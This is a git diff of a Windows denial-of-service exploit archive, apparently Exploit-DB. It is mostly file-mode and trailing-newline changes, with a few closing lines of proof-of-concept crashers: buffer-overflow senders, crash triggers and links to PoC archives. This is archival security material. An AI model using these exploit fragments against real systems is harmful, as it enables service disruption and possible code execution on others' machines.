b/platforms/windows/dos/40598.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40599.txt b/platforms/windows/dos/40599.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40600.txt b/platforms/windows/dos/40600.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40601.txt b/platforms/windows/dos/40601.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40602.html b/platforms/windows/dos/40602.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40603.html b/platforms/windows/dos/40603.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40604.html b/platforms/windows/dos/40604.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40605.html b/platforms/windows/dos/40605.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40617.txt b/platforms/windows/dos/40617.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40648.txt b/platforms/windows/dos/40648.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40649.html b/platforms/windows/dos/40649.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40656.txt b/platforms/windows/dos/40656.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40657.txt b/platforms/windows/dos/40657.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40658.txt b/platforms/windows/dos/40658.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40659.txt b/platforms/windows/dos/40659.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40661.txt b/platforms/windows/dos/40661.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40662.txt b/platforms/windows/dos/40662.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40663.txt b/platforms/windows/dos/40663.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40664.txt b/platforms/windows/dos/40664.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40665.txt b/platforms/windows/dos/40665.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40666.txt b/platforms/windows/dos/40666.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40667.txt b/platforms/windows/dos/40667.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40668.txt b/platforms/windows/dos/40668.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4067.html b/platforms/windows/dos/4067.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40685.html b/platforms/windows/dos/40685.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40691.html b/platforms/windows/dos/40691.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40699.txt b/platforms/windows/dos/40699.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40722.html b/platforms/windows/dos/40722.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40743.html b/platforms/windows/dos/40743.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40744.txt b/platforms/windows/dos/40744.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40745.c b/platforms/windows/dos/40745.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40747.html b/platforms/windows/dos/40747.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40748.html b/platforms/windows/dos/40748.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40757.xhtml b/platforms/windows/dos/40757.xhtml old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40761.html b/platforms/windows/dos/40761.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40766.txt b/platforms/windows/dos/40766.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40773.html b/platforms/windows/dos/40773.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40784.html b/platforms/windows/dos/40784.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40785.html b/platforms/windows/dos/40785.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40786.html b/platforms/windows/dos/40786.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40787.html b/platforms/windows/dos/40787.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40793.html b/platforms/windows/dos/40793.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40797.html b/platforms/windows/dos/40797.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40798.html b/platforms/windows/dos/40798.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40815.html b/platforms/windows/dos/40815.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40820.txt b/platforms/windows/dos/40820.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40841.html b/platforms/windows/dos/40841.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40843.html b/platforms/windows/dos/40843.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40844.html b/platforms/windows/dos/40844.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40845.txt b/platforms/windows/dos/40845.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40875.html b/platforms/windows/dos/40875.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40878.txt b/platforms/windows/dos/40878.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40879.html b/platforms/windows/dos/40879.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40880.txt b/platforms/windows/dos/40880.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40893.html b/platforms/windows/dos/40893.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40894.html b/platforms/windows/dos/40894.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40896.html b/platforms/windows/dos/40896.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40907.html b/platforms/windows/dos/40907.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40915.txt b/platforms/windows/dos/40915.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40922.html b/platforms/windows/dos/40922.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40923.html b/platforms/windows/dos/40923.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40933.svg b/platforms/windows/dos/40933.svg old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40935.html b/platforms/windows/dos/40935.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40946.html b/platforms/windows/dos/40946.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40947.html b/platforms/windows/dos/40947.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40948.html b/platforms/windows/dos/40948.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40960.svg b/platforms/windows/dos/40960.svg old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41018.txt b/platforms/windows/dos/41018.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41025.txt b/platforms/windows/dos/41025.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41042.html b/platforms/windows/dos/41042.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4118.html b/platforms/windows/dos/4118.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4120.html b/platforms/windows/dos/4120.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4121.txt b/platforms/windows/dos/4121.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4126.c b/platforms/windows/dos/4126.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41357.html b/platforms/windows/dos/41357.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41363.txt b/platforms/windows/dos/41363.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41364.txt b/platforms/windows/dos/41364.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41365.txt b/platforms/windows/dos/41365.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41367.txt b/platforms/windows/dos/41367.txt old mode 100755 new mode 100644 index 25eb99f4b..862a108a2 --- a/platforms/windows/dos/41367.txt +++ b/platforms/windows/dos/41367.txt @@ -76,5 +76,4 @@ Invalid exception stack at ffffffff 2017-02-09 information sent with the PoC -no reply if they plan to release a fix or not - \ No newline at end of file +no reply if they plan to release a fix or not \ No newline at end of file diff --git a/platforms/windows/dos/4137.html b/platforms/windows/dos/4137.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41417.txt b/platforms/windows/dos/41417.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41418.txt b/platforms/windows/dos/41418.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41419.txt b/platforms/windows/dos/41419.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41425.txt b/platforms/windows/dos/41425.txt old mode 100755 new mode 100644 index de864e87c..09810d6b8 --- a/platforms/windows/dos/41425.txt +++ b/platforms/windows/dos/41425.txt @@ -164,4 +164,4 @@ Permission is hereby granted for the redistribution of this advisory, provided t that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information -or exploits by the author or elsewhere. \ No newline at end of file +or exploits by the author or elsewhere. \ No newline at end of file diff --git a/platforms/windows/dos/41426.txt b/platforms/windows/dos/41426.txt old mode 100755 new mode 100644 index 4fb945f7c..96ad32be1 --- a/platforms/windows/dos/41426.txt +++ b/platforms/windows/dos/41426.txt @@ -96,4 +96,4 @@ Permission is hereby granted for the redistribution of this advisory, provided t that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information -or exploits by the author or elsewhere. \ No newline at end of file +or exploits by the author or elsewhere. \ No newline at end of file diff --git a/platforms/windows/dos/41454.html b/platforms/windows/dos/41454.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41474.py b/platforms/windows/dos/41474.py index a492ba87d..e7fa5b1e9 100755 --- a/platforms/windows/dos/41474.py +++ b/platforms/windows/dos/41474.py @@ -27,5 +27,4 @@ while True: conn.send('220 '+buffer+'\r\n') conn.recv(1024) conn.send('250 '+buffer+'\r\n') - conn.close() - \ No newline at end of file + conn.close() \ No newline at end of file diff --git a/platforms/windows/dos/4148.html b/platforms/windows/dos/4148.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4149.html b/platforms/windows/dos/4149.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41615.txt b/platforms/windows/dos/41615.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41620.txt b/platforms/windows/dos/41620.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41623.html b/platforms/windows/dos/41623.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41639.txt b/platforms/windows/dos/41639.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41645.txt b/platforms/windows/dos/41645.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41646.txt b/platforms/windows/dos/41646.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41647.txt b/platforms/windows/dos/41647.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41648.txt b/platforms/windows/dos/41648.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41649.txt b/platforms/windows/dos/41649.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41650.txt b/platforms/windows/dos/41650.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41651.txt b/platforms/windows/dos/41651.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41652.txt b/platforms/windows/dos/41652.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41653.txt b/platforms/windows/dos/41653.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41654.txt b/platforms/windows/dos/41654.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41655.txt b/platforms/windows/dos/41655.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41656.txt b/platforms/windows/dos/41656.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41657.txt b/platforms/windows/dos/41657.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41658.txt b/platforms/windows/dos/41658.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41659.txt b/platforms/windows/dos/41659.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41661.html b/platforms/windows/dos/41661.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41667.py b/platforms/windows/dos/41667.py index eea16ae18..318509275 100755 --- a/platforms/windows/dos/41667.py +++ b/platforms/windows/dos/41667.py @@ -33,4 +33,4 @@ httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n") httpsocket.close() -print "SpyCamLizard shutted down!" \ No newline at end of file +print "SpyCamLizard shutted down!" \ No newline at end of file diff --git a/platforms/windows/dos/4168.vbs b/platforms/windows/dos/4168.vbs old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41734.c b/platforms/windows/dos/41734.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41737.txt b/platforms/windows/dos/41737.txt old mode 100755 new mode 100644 index 9a9b4ec64..d7df0093e --- a/platforms/windows/dos/41737.txt +++ b/platforms/windows/dos/41737.txt @@ -44,8 +44,4 @@ Tested on: Windows 7 -Win xp - - - - \ No newline at end of file +Win xp \ No newline at end of file diff --git a/platforms/windows/dos/41756.txt b/platforms/windows/dos/41756.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41851.txt b/platforms/windows/dos/41851.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41879.txt b/platforms/windows/dos/41879.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41880.cpp b/platforms/windows/dos/41880.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41941.html b/platforms/windows/dos/41941.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41945.c b/platforms/windows/dos/41945.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/41957.html b/platforms/windows/dos/41957.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42002.txt b/platforms/windows/dos/42002.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42006.cpp b/platforms/windows/dos/42006.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42007.cpp b/platforms/windows/dos/42007.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42008.cpp b/platforms/windows/dos/42008.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42009.txt b/platforms/windows/dos/42009.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42021.txt b/platforms/windows/dos/42021.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42081.txt b/platforms/windows/dos/42081.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42088.txt b/platforms/windows/dos/42088.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42092.txt b/platforms/windows/dos/42092.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42140.c b/platforms/windows/dos/42140.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42182.cpp b/platforms/windows/dos/42182.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/422.c b/platforms/windows/dos/422.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42210.cpp b/platforms/windows/dos/42210.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42211.cpp b/platforms/windows/dos/42211.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42212.cpp b/platforms/windows/dos/42212.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42213.cpp b/platforms/windows/dos/42213.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42214.txt b/platforms/windows/dos/42214.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42215.cpp b/platforms/windows/dos/42215.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42216.cpp b/platforms/windows/dos/42216.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42217.cpp b/platforms/windows/dos/42217.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42218.cpp b/platforms/windows/dos/42218.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42219.cpp b/platforms/windows/dos/42219.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42220.cpp b/platforms/windows/dos/42220.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42223.cpp b/platforms/windows/dos/42223.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42224.cpp b/platforms/windows/dos/42224.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42225.cpp b/platforms/windows/dos/42225.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42226.cpp b/platforms/windows/dos/42226.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42227.cpp b/platforms/windows/dos/42227.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42228.cpp b/platforms/windows/dos/42228.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42229.cpp b/platforms/windows/dos/42229.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42230.txt b/platforms/windows/dos/42230.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42231.cpp b/platforms/windows/dos/42231.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42232.cpp b/platforms/windows/dos/42232.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42233.cpp b/platforms/windows/dos/42233.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42234.txt b/platforms/windows/dos/42234.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42235.txt b/platforms/windows/dos/42235.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42236.txt b/platforms/windows/dos/42236.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42237.txt b/platforms/windows/dos/42237.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42238.txt b/platforms/windows/dos/42238.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42239.txt b/platforms/windows/dos/42239.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42240.txt b/platforms/windows/dos/42240.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42241.txt b/platforms/windows/dos/42241.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42242.cpp b/platforms/windows/dos/42242.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42243.txt b/platforms/windows/dos/42243.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42244.cpp b/platforms/windows/dos/42244.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42246.html b/platforms/windows/dos/42246.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42253.html b/platforms/windows/dos/42253.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42264.txt b/platforms/windows/dos/42264.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4227.php b/platforms/windows/dos/4227.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42302.txt b/platforms/windows/dos/42302.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42336.html b/platforms/windows/dos/42336.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42337.html b/platforms/windows/dos/42337.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42338.cpp b/platforms/windows/dos/42338.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42459.html b/platforms/windows/dos/42459.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42464.html b/platforms/windows/dos/42464.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42465.html b/platforms/windows/dos/42465.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42466.html b/platforms/windows/dos/42466.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42467.html b/platforms/windows/dos/42467.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42468.html b/platforms/windows/dos/42468.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42469.html b/platforms/windows/dos/42469.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42470.html b/platforms/windows/dos/42470.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42471.html b/platforms/windows/dos/42471.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42472.html b/platforms/windows/dos/42472.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42473.html b/platforms/windows/dos/42473.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42474.html b/platforms/windows/dos/42474.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42475.html b/platforms/windows/dos/42475.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42476.html b/platforms/windows/dos/42476.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42477.html b/platforms/windows/dos/42477.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42478.html b/platforms/windows/dos/42478.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42479.html b/platforms/windows/dos/42479.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42480.txt b/platforms/windows/dos/42480.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42481.js b/platforms/windows/dos/42481.js old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4251.html b/platforms/windows/dos/4251.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/427.c b/platforms/windows/dos/427.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4272.c b/platforms/windows/dos/4272.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42741.cpp b/platforms/windows/dos/42741.cpp old mode 100755 new mode 100644 index 1ac82ae1c..03ac33dd8 --- a/platforms/windows/dos/42741.cpp +++ b/platforms/windows/dos/42741.cpp @@ -123,4 +123,4 @@ int main(int argc, char **argv) { DeleteDC(hdc); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42742.cpp b/platforms/windows/dos/42742.cpp old mode 100755 new mode 100644 index 50d7f111e..34584a286 --- a/platforms/windows/dos/42742.cpp +++ b/platforms/windows/dos/42742.cpp @@ -153,4 +153,4 @@ int main() { DestroyWindow(hwnd); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42743.cpp b/platforms/windows/dos/42743.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42744.txt b/platforms/windows/dos/42744.txt old mode 100755 new mode 100644 index 2e58dd8d6..edf4bcfbc --- a/platforms/windows/dos/42744.txt +++ b/platforms/windows/dos/42744.txt @@ -121,4 +121,4 @@ Attached is an archive with several proof-of-concept mutated TTF files. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42744.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42744.zip \ No newline at end of file diff --git a/platforms/windows/dos/42746.txt b/platforms/windows/dos/42746.txt old mode 100755 new mode 100644 index aa2696169..3e5fd876b --- a/platforms/windows/dos/42746.txt +++ b/platforms/windows/dos/42746.txt @@ -110,4 +110,4 @@ Attached is an archive with several proof-of-concept mutated TTF files. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42746.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42746.zip \ No newline at end of file diff --git a/platforms/windows/dos/42747.cpp b/platforms/windows/dos/42747.cpp old mode 100755 new mode 100644 index f0b6ceac3..faaaa3965 --- a/platforms/windows/dos/42747.cpp +++ b/platforms/windows/dos/42747.cpp @@ -84,4 +84,4 @@ int main() { PrintHex(OutputBuffer, sizeof(OutputBuffer)); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42748.cpp b/platforms/windows/dos/42748.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42749.cpp b/platforms/windows/dos/42749.cpp old mode 100755 new mode 100644 index 164890c2e..34767a604 --- a/platforms/windows/dos/42749.cpp +++ b/platforms/windows/dos/42749.cpp @@ -151,4 +151,4 @@ int main() { DeleteDC(pd.hDC); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42750.cpp b/platforms/windows/dos/42750.cpp old mode 100755 new mode 100644 index 4f0bfb276..8c77f7f25 --- a/platforms/windows/dos/42750.cpp +++ b/platforms/windows/dos/42750.cpp @@ -116,4 +116,4 @@ int main() { PrintHex(OutputBuffer, sizeof(OutputBuffer)); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42758.txt b/platforms/windows/dos/42758.txt old mode 100755 new mode 100644 index 13a5c82d2..8aeef0aba --- a/platforms/windows/dos/42758.txt +++ b/platforms/windows/dos/42758.txt @@ -112,4 +112,4 @@ edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructo Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42758.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42758.zip \ No newline at end of file diff --git a/platforms/windows/dos/42759.html b/platforms/windows/dos/42759.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42763.html b/platforms/windows/dos/42763.html old mode 100755 new mode 100644 index 769bcba3a..5b520a81c --- a/platforms/windows/dos/42763.html +++ b/platforms/windows/dos/42763.html @@ -19,4 +19,4 @@ function f() { } = {}); } -f(); +f(); \ No newline at end of file diff --git a/platforms/windows/dos/42764.html b/platforms/windows/dos/42764.html old mode 100755 new mode 100644 index f8c35b72a..6a81d2a45 --- a/platforms/windows/dos/42764.html +++ b/platforms/windows/dos/42764.html @@ -82,4 +82,4 @@ let h = function f(a0 = (function () { for (let i = 0; i < 0x10000; i++) { h(); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/42765.html b/platforms/windows/dos/42765.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42766.html b/platforms/windows/dos/42766.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/428.c b/platforms/windows/dos/428.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4281.c b/platforms/windows/dos/4281.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4285.c b/platforms/windows/dos/4285.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4288.c b/platforms/windows/dos/4288.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4289.php b/platforms/windows/dos/4289.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/429.c b/platforms/windows/dos/429.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42917.py b/platforms/windows/dos/42917.py index d2a320152..df5977e2a 100755 --- a/platforms/windows/dos/42917.py +++ b/platforms/windows/dos/42917.py @@ -29,4 +29,4 @@ b = junk+EIP+"D"*500 f = open('buffer.txt','w') f.write(b) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/42962.py b/platforms/windows/dos/42962.py index 1d4394d5e..fd412c43e 100755 --- a/platforms/windows/dos/42962.py +++ b/platforms/windows/dos/42962.py @@ -33,4 +33,4 @@ while True: print(conn.recv(1024)) conn.send('230 OK\r\n') print(conn.recv(1024)) - conn.send('220 "'+buffer+'" is current directory\r\n') + conn.send('220 "'+buffer+'" is current directory\r\n') \ No newline at end of file diff --git a/platforms/windows/dos/42994.txt b/platforms/windows/dos/42994.txt old mode 100755 new mode 100644 index 9674cc64a..400fa27ed --- a/platforms/windows/dos/42994.txt +++ b/platforms/windows/dos/42994.txt @@ -78,6 +78,4 @@ machine. That´s it, now just open the 'GLK' files. Both 'cmd.exe' and the CPL file should be executed/loaded. Notice the files located in the remote share will take longer than 'CMD.exe' to be executed for obvious -reasons, just wait a few seconds. - - +reasons, just wait a few seconds. \ No newline at end of file diff --git a/platforms/windows/dos/42995.txt b/platforms/windows/dos/42995.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42997.txt b/platforms/windows/dos/42997.txt old mode 100755 new mode 100644 index 85a4e7577..23a80c02d --- a/platforms/windows/dos/42997.txt +++ b/platforms/windows/dos/42997.txt @@ -31,4 +31,4 @@ The class creation succeeded and the HTML file executed notepad. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42997.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42997.zip \ No newline at end of file diff --git a/platforms/windows/dos/42998.js b/platforms/windows/dos/42998.js old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/42999.js b/platforms/windows/dos/42999.js old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/43000.js b/platforms/windows/dos/43000.js old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/43001.cpp b/platforms/windows/dos/43001.cpp old mode 100755 new mode 100644 index bdcb383d5..4fad42b41 --- a/platforms/windows/dos/43001.cpp +++ b/platforms/windows/dos/43001.cpp @@ -120,4 +120,4 @@ int main() { CloseHandle(hFile); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/43026.py b/platforms/windows/dos/43026.py index 8be499370..f3ef72b1b 100755 --- a/platforms/windows/dos/43026.py +++ b/platforms/windows/dos/43026.py @@ -58,5 +58,4 @@ def main(): t.start() if __name__ == '__main__': - main() - + main() \ No newline at end of file diff --git a/platforms/windows/dos/4304.php b/platforms/windows/dos/4304.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/43058.c b/platforms/windows/dos/43058.c old mode 100755 new mode 100644 index 80576162e..53eee3c35 --- 